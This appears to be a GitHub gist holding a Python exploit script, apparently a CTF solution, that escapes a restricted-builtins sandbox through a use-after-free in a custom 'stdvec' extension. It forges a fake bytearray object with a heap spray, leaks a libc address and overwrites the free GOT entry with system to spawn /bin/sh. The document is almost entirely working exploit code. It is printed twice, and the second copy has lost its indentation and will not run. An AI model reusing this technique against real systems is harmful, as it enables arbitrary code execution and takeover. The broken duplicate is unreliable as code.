Charo-IT/exploit.py Secret

## exploit.py
import stdvec

from sys import modules
del modules['os']
keys = list(__builtins__.__dict__.keys())
for k in keys:
    # present for you
    if k not in ['int', 'id', 'print', 'range', 'hex', 'bytearray', 'bytes']:
        del __builtins__.__dict__[k]

def p64(v):
    return v.to_bytes(8, "little")

def read_long(view, offset):
    value = 0
    for i in range(8):
        value += view[offset + i] << (i * 8)
    return value

def write_long(view, offset, value):
    for i in range(8):
        view[offset + i] = (value >> (i * 8)) & 0xff

sh = bytearray(b"/bin/sh\x00" + b"\x00" * 512)

l = stdvec.StdVec()

fake_bytearray = b""
fake_bytearray += p64(5)  # ref_count
fake_bytearray += p64(0xa1ac40)  # PyByteArray_Type
fake_bytearray += p64(0x10000)  # obj_size
fake_bytearray += p64(0x10001)  # size
fake_bytearray += p64(0xa00000)  # buf
fake_bytearray += p64(0xa00000)  # buf
fake_bytearray_address = id(fake_bytearray) + 0x20

# vectorに適当に要素を追加
for i in range(64):
    l.append(i)

spray = []

cnt = 0
for x in l:
    if cnt == 0:
        # vectorのreallocを発生させる
        # このとき、StdVecIterはrealloc前の領域を参照したままになる
        l.append(0x1337)
        for i in range(5):
            # PyObject_Malloc(size) uses _libc_malloc if size > 512
            spray.append(bytearray(p64(fake_bytearray_address) * (64 + i % 2)))
    elif cnt == 1:
        assert(x[0] == 0xc0)
        view = x
        break
    cnt += 1

libc = read_long(view, 0x2f0) - 0x970e0
write_long(view, 0x520, libc + 0x4f4e0)  # got overwrite (free -> system)

del sh
	import stdvec

	from sys import modules
	del modules['os']
	keys = list(__builtins__.__dict__.keys())
	for k in keys:
	# present for you
	if k not in ['int', 'id', 'print', 'range', 'hex', 'bytearray', 'bytes']:
	del __builtins__.__dict__[k]

	def p64(v):
	return v.to_bytes(8, "little")

	def read_long(view, offset):
	value = 0
	for i in range(8):
	value += view[offset + i] << (i * 8)
	return value

	def write_long(view, offset, value):
	for i in range(8):
	view[offset + i] = (value >> (i * 8)) & 0xff

	sh = bytearray(b"/bin/sh\x00" + b"\x00" * 512)

	l = stdvec.StdVec()

	fake_bytearray = b""
	fake_bytearray += p64(5) # ref_count
	fake_bytearray += p64(0xa1ac40) # PyByteArray_Type
	fake_bytearray += p64(0x10000) # obj_size
	fake_bytearray += p64(0x10001) # size
	fake_bytearray += p64(0xa00000) # buf
	fake_bytearray += p64(0xa00000) # buf
	fake_bytearray_address = id(fake_bytearray) + 0x20

	# vectorに適当に要素を追加
	for i in range(64):
	l.append(i)

	spray = []

	cnt = 0
	for x in l:
	if cnt == 0:
	# vectorのreallocを発生させる
	# このとき、StdVecIterはrealloc前の領域を参照したままになる
	l.append(0x1337)
	for i in range(5):
	# PyObject_Malloc(size) uses _libc_malloc if size > 512
	spray.append(bytearray(p64(fake_bytearray_address) * (64 + i % 2)))
	elif cnt == 1:
	assert(x[0] == 0xc0)
	view = x
	break
	cnt += 1

	libc = read_long(view, 0x2f0) - 0x970e0
	write_long(view, 0x520, libc + 0x4f4e0) # got overwrite (free -> system)

	del sh